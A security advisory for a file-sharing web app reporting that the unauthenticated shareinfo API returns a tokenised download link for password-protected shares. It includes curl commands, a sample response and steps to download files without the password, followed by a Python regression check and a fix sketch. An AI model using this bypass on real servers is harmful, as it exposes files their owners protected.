Example response from the shareinfo API request described in the PoC:
{
  "shareTheme": "default",
  "title": "Shared files - IMG_20240814_213703451.jpg",
  "description": "A share has been sent to you to view or download.",
  "disableSidebar": false,
  "source": "/folder",
  "path": "/IMG_20240814_213703451.jpg/",
  "downloadURL": "https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D",
  "shareURL": "https://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA",
  "enforceDarkLightMode": "default",
  "viewMode": "normal",
  "shareType": "normal",
  "sidebarLinks": [
    {
      "name": "Share QR Code and Info",
      "category": "shareInfo",
      "target": "#",
      "icon": "qr_code"
    },
    {
      "name": "Download",
      "category": "download",
      "target": "#",
      "icon": "download"
    }
  ],
  "hasPassword": true
}
Summary
When you create a password-protected share for a file, people can completely bypass the password and still download the file.
Details
This happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password.
PoC
Now, the link you copied should look like:
https://yourdomain/public/share/yoursharehash
example:
https://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA
Now, make an API request with any API client to GET
https://yourdomain/public/api/shareinfo?hash=(the share hash from the link)
example:
https://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA
If you like using curl, a command line based API client, here's the command:
curl 'https://yourdomain/public/api/shareinfo?hash=yoursharehash' -H 'Accept: */*'
example:
curl 'https://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA' -H 'Accept: */*'
Example response: see the JSON response shown at the start of this report.
Now, see the downloadURL field in the response? You are almost done. The response encodes the "&" symbol as "\u0026", so just replace "\u0026" with "&". Example:
https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D
should be changed to:
https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D
Then just copy and paste your new link (example: https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D) into any browser of your choice, and the file will download, all without giving a password.
Impact
This affects anyone who believes their file shares are secure because they are protected with a password; as this report explains, they actually aren't.
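A regression check for the behaviour described in this report, as an added example that is not part of the original advisory or the project's own code. The function names and the serializer are hypothetical, and the sample response is constructed from the field names shown above, with placeholder hash and token values.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Constructed sample: same field names as the response in this report,
# placeholder hash and token. A raw string keeps the \u0026 escape as sent.
LEAKY = r'''{"shareURL": "https://example.com/public/share/SHAREHASH",
 "downloadURL": "https://example.com/public/api/raw?hash=SHAREHASH\u0026token=PLACEHOLDER",
 "hasPassword": true}'''


def leaks_download_token(raw_response: str) -> bool:
    """Return True if a share-info reply obtained WITHOUT the password
    describes a password-protected share and still carries a downloadURL
    with a token parameter."""
    # json.loads decodes the \u0026 escape to "&"; it is ordinary JSON
    # escaping, not a protection of any kind.
    info = json.loads(raw_response)
    if not info.get("hasPassword"):
        return False
    query = parse_qs(urlsplit(info.get("downloadURL") or "").query)
    return bool(query.get("token"))


def public_share_info(share: dict, password_ok: bool) -> dict:
    """Hypothetical serializer for the share-info response: withhold the
    direct download link until the share password has been verified.
    This covers the response only; the download endpoint must enforce
    the same check itself."""
    info = dict(share)
    if info.get("hasPassword") and not password_ok:
        info.pop("downloadURL", None)
    return info


if __name__ == "__main__":
    print("leaky response flagged:", leaks_download_token(LEAKY))
    gated = public_share_info(json.loads(LEAKY), password_ok=False)
    print("gated response flagged:", leaks_download_token(json.dumps(gated)))
```

Run as a test against a staging instance's unauthenticated share-info reply, the check should report False for every share that has hasPassword set to true.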